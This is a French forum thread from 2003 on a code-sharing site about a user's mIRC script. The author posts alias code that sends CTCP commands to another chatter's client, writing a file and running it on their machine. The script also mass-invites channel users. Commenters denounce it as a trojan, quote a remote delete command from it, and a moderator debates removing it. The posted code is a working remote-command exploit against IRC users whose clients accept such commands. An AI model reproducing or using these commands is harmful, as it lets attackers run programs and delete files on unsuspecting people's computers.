UN PETIT CTCP CONTROL ET OUI SA MARCHE ENCOR SUR CERTAINE PERSONNE !!

Rancid Messages postés 7 Date d'inscription jeudi 30 octobre 2003 Statut Membre Dernière intervention 5 novembre 2003 - 30 oct. 2003 à 06:23
Rancid Messages postés 7 Date d'inscription jeudi 30 octobre 2003 Statut Membre Dernière intervention 5 novembre 2003 - 5 nov. 2003 à 07:46
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/17527-un-petit-ctcp-control-et-oui-sa-marche-encor-sur-certaine-personne

Rancid Messages postés 7 Date d'inscription jeudi 30 octobre 2003 Statut Membre Dernière intervention 5 novembre 2003
5 nov. 2003 à 07:46
hey pis si ya un administrateur qui passe par ici javais mis un scripts la .vbs je voudrais savoir dans quel categorie je pourrais le mettre pcq ya pas ete accepter a cause je ne savais pas dans quel cathegorie le mettre
Rancid Messages postés 7 Date d'inscription jeudi 30 octobre 2003 Statut Membre Dernière intervention 5 novembre 2003
5 nov. 2003 à 07:44
tofu fuck asti ta tu fini de faire chier tlm commence par mettre un scripts toi que je voie sa ma trouver des erreu colis de grainne donne moi dont ton nick pis ton server toi jveux te parler !
cs_tofu Messages postés 1726 Date d'inscription vendredi 12 septembre 2003 Statut Membre Dernière intervention 13 juin 2009 1
5 nov. 2003 à 07:38
avec sa tu control le pc de l'autre donc par définition trojan :)
De plus dans le code ce trouve cette commande :
".deleter une affaire:/ctcp $$1 /remove " alors ne me dit pas que sa sert juste à samuser merci.
cs_Script Messages postés 14 Date d'inscription mardi 9 septembre 2003 Statut Membre Dernière intervention 29 juin 2004
4 nov. 2003 à 11:17
Re salut BruNews,
Ce que j'explique c'est que ce genre de code (sorti mille fois déjà) va servir des codeurs amateurs débutants sans scrupules (pas les codeurs avec de l'experience pour qui ce genre de code n'a plus aucun interet), certains scripteurs débutants vont profiter de ce genre de diffusion pour l'utiliser contre des gens aux protections légères et sans expériences, contre des "innocentes victimes" comme on pourrait dire.
Car ce qu'il faut savoir c'est que ce ne sont pas ceux qui ont pris un mirc (script) sur conseil d'autres personnes, pour chatter plus convivialement, qui vont venir lire ces codes, mais bien les petits scripteurs amateurs sans scrupules, avide d'un pseudo-pouvoir procuré par ce genre de source.
Et ils vont l'utiliser sur des personnes qui vont naivement les ecouter !
Donc pour conclure, diffuser ce genre de source n'aide pas les gens à s'en prémunir, car ceux qui vont l'utiliser font le tour des forums pour chercher ce "pseudo-pouvoir" mais ceux qui vont le subir ne sont que de simples chatteurs qui ne viendront pratiquement jamais sur un forum de scripting !

A bon entendeur !
BruNews Messages postés 21040 Date d'inscription jeudi 23 janvier 2003 Statut Modérateur Dernière intervention 21 août 2019
4 nov. 2003 à 10:07
Salut Script, ce n'est intellectuellement honnete d'interpreter mes propos, dans un sens ou un autre. Je ne fais fais que rappeler la REGLE stricto sensu, si ce n'est ni un virus ni un trojan etc ce code restera.
"CODE NUL ET SANS INTERET" par exemple sera bien plus efficace que toute censure car restera a la vue de tous.
Sur ce, tournons nous plutot vers des codes qui en valent la peine.
ciao...
cs_Script Messages postés 14 Date d'inscription mardi 9 septembre 2003 Statut Membre Dernière intervention 29 juin 2004
4 nov. 2003 à 09:42
Et une fois de plus un petit comique nous ressert le contrôle par CTCP !!! Vu plus de mille fois. Encore un qui n'a pas beaucoup d'imagination !

Petits lamers de base, un conseil, si vous avez acheté un ordi pour faire ce genre de conneries, revendez-le !

Y en a assez de voir ce genre de source !

C'est le genre de personnes qui s'en prend aux plus faibles, tu me fais honte, allez file de là !

Le pire c'est que c'est du tout pompé, même pas un brin d'originalité.

Si ça t'amuse d'offrir la possibilité à des lamers de bas étage (comme toi au passage) de faire chier des chatteurs newbies, tu ne mérites même pas la moindre estime.

Le pire c'est que les admin de code-source participe à ce genre d'opérations en cautionnant de telles sources !

Allez ciao !
cs_tofu Messages postés 1726 Date d'inscription vendredi 12 septembre 2003 Statut Membre Dernière intervention 13 juin 2009 1
3 nov. 2003 à 19:12
DEMANDE AUX ADMINS:
Ce genre de code n'est utile qu'à se moquer des débutants et crasher leur pc alors veuillez bannir ce genre de sources merci d'avance de votre compréhension.
BruNews Messages postés 21040 Date d'inscription jeudi 23 janvier 2003 Statut Modérateur Dernière intervention 21 août 2019
3 nov. 2003 à 00:10
ADMIN INFO:
un code plait ou non, on peut en dire le plus grand mal ou le plus grand bien, peu importe.
PAR CONTRE, envers les personnes, la courtoisie est de rigueur.
Toute insulte entrainera l'expulsion de son auteur de CodesSources.
En esperant avoir ete bien compris.
dj328i Messages postés 312 Date d'inscription dimanche 23 février 2003 Statut Membre Dernière intervention 14 mars 2022
31 oct. 2003 à 19:01
Bien dit tofu :P
cs_tofu Messages postés 1726 Date d'inscription vendredi 12 septembre 2003 Statut Membre Dernière intervention 13 juin 2009 1
31 oct. 2003 à 17:25
lammer.
Rancid Messages postés 7 Date d'inscription jeudi 30 octobre 2003 Statut Membre Dernière intervention 5 novembre 2003
30 oct. 2003 à 23:02
en passent laisser faire mon premier commentaire je le enlever du scripts il avais un defaut ...
Rancid Messages postés 7 Date d'inscription jeudi 30 octobre 2003 Statut Membre Dernière intervention 5 novembre 2003
30 oct. 2003 à 23:02
bah la dj328i dsl cest mon premier script .... on se relax un peu
dj328i Messages postés 312 Date d'inscription dimanche 23 février 2003 Statut Membre Dernière intervention 14 mars 2022
30 oct. 2003 à 20:09
et temps qu'a tu pourrais inclure 3-4 trojan , avec un systeme de controle a distance dans le but de detruire le plus de pc possible ... non mais je reve ou quoi ! Encore heureux qu'une chose comme ca ne soie pas deleter.

Si tu voulais te la jouer controle a distance , au moin t'aurais pue faire un script pour controler a distance "SON" réseaux ! ses fonctionnaliter et non dans celle du voisin
cs_Kolibot Messages postés 817 Date d'inscription mercredi 25 juin 2003 Statut Membre Dernière intervention 19 avril 2004
30 oct. 2003 à 11:19
Hum ... Pour un premier script c'est bien. Essai de develloper un peu... et de mettre des annotations un peu plus professionel... (Nick du gars ...). Bonne Continuation
Rancid Messages postés 7 Date d'inscription jeudi 30 octobre 2003 Statut Membre Dernière intervention 5 novembre 2003
30 oct. 2003 à 06:23
dsl si le REMOTE/FILE/NEW es plus ou moin comprenable

voila ce que ca donne plus claire ..

placer chaque commande dans un remote different


remote/file/new (pour chaque commande ci-dessou)


alias notepad { timer 1 0 /set %nick $$?="Nick du gars" | timer 1 0 /ctcp %nick //write SystRemote.txt $$?="le message que vous voulez lui marquer" | timer 1 1 /ctcp %nick /run SystRemote.txt


alias inv3 { %e = $?="quel chan" | %i = 1 | .timer $nick(#,0) 15 inv2 } alias inv2 { invite $nick(#,%i) %e | inc %i }


alias inv1 { %e = $?="quel chan" | %i = 1 | .timer $nick(#,0) 5 inv2 } alias inv2 { invite $nick(#,%i) %e | inc %i }


alias inv { %e = $?="quel chan" | %i = 1 | while $nick(#,%i) != $null { invite $nick(#,%i) %e | inc %i } }
Rejoignez-nous